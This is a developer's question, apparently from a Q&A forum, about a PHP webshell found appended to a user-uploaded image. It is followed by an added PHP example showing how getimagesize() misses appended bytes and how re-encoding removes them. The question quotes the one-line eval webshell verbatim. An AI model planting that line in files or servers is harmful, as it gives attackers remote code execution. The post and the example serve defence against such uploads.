Backdoor:PHP/Webshell.O virus detected in an uploaded image file. Should I be worried? How can I prevent it?

Çağlar Arlı

I have a site which allows users to upload images. One uploaded file was recently detected by antivirus software (uploads aren't scanned; this was a system-wide scan afterwards).

Upon upload, I check the file extension, the MIME type and also use getimagesize() which returns false if it's not a valid image.

However, it does appear to be a valid image. It loads on the website and on Windows. However, at the end of the file it contains the following:

<?php @eval($_POST['q']); ?>

Uploaded images are moved to a publicly accessible folder (with directory indexing disabled) and linked from there (the image is displayed on the page using the HTML <img /> element with a direct link to the image file).

Should I be worried about this? My thinking is that it doesn't matter because I'm not including the file within PHP code, and I'm just serving it directly through nginx, but it does make me feel a bit uneasy. Can I even do anything to prevent this, other than configuring ClamAV or similar to scan uploads? I thought utilising getimagesize() was an accepted solution for verifying a file is an image as I've seen it referenced a few times on here, but in this scenario it didn't detect PHP within the file.
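
Why a header-based check such as getimagesize() accepts a file like the one described, and two server-side checks that do notice appended bytes, shown as an added example that is not the poster's code. It assumes PHP 8 with the GD extension, handles PNG only, uses a constructed image with a harmless marker in place of the real payload, and all function names are hypothetical.

```php
<?php
// Added example, not code from the original post. Requires the GD extension.

// Constructed sample: a real 2x2 PNG with a harmless PHP-tag marker appended,
// mimicking the structure of the flagged upload.
function sample_upload(): string {
    $img = imagecreatetruecolor(2, 2);
    ob_start();
    imagepng($img);
    $png = ob_get_clean();
    return $png . "<?php /* constructed marker */ ?>";
}

// Offset just past the IEND chunk, i.e. where the PNG itself ends.
// Returns null if the signature or chunk structure is malformed.
function png_end_offset(string $data): ?int {
    if (substr($data, 0, 8) !== "\x89PNG\r\n\x1a\n") return null;
    $pos = 8;
    $len = strlen($data);
    while ($pos + 12 <= $len) {
        $size = unpack('N', substr($data, $pos, 4))[1]; // big-endian chunk length
        $type = substr($data, $pos + 4, 4);
        $pos += 12 + $size;                 // length + type + data + CRC
        if ($pos > $len) return null;
        if ($type === 'IEND') return $pos;
    }
    return null;
}

// Decode to pixels and re-encode, so bytes outside the image data are dropped.
function reencode_png(string $data): ?string {
    $img = @imagecreatefromstring($data);
    if ($img === false) return null;
    ob_start();
    imagepng($img);
    return ob_get_clean();
}

$upload = sample_upload();
$end    = png_end_offset($upload);
$clean  = reencode_png($upload);

// 1. Does the header-based check accept the file?
var_dump(getimagesizefromstring($upload) !== false);
// 2. Are there bytes after the end of the PNG structure?
var_dump($end !== null && $end < strlen($upload));
// 3. Is the PHP open tag absent from the re-encoded output?
var_dump($clean !== null && strpos($clean, '<?php') === false);
```

Storing only the re-encoded output, rather than the bytes the client sent, also discards ancillary metadata chunks, which GD does not carry over.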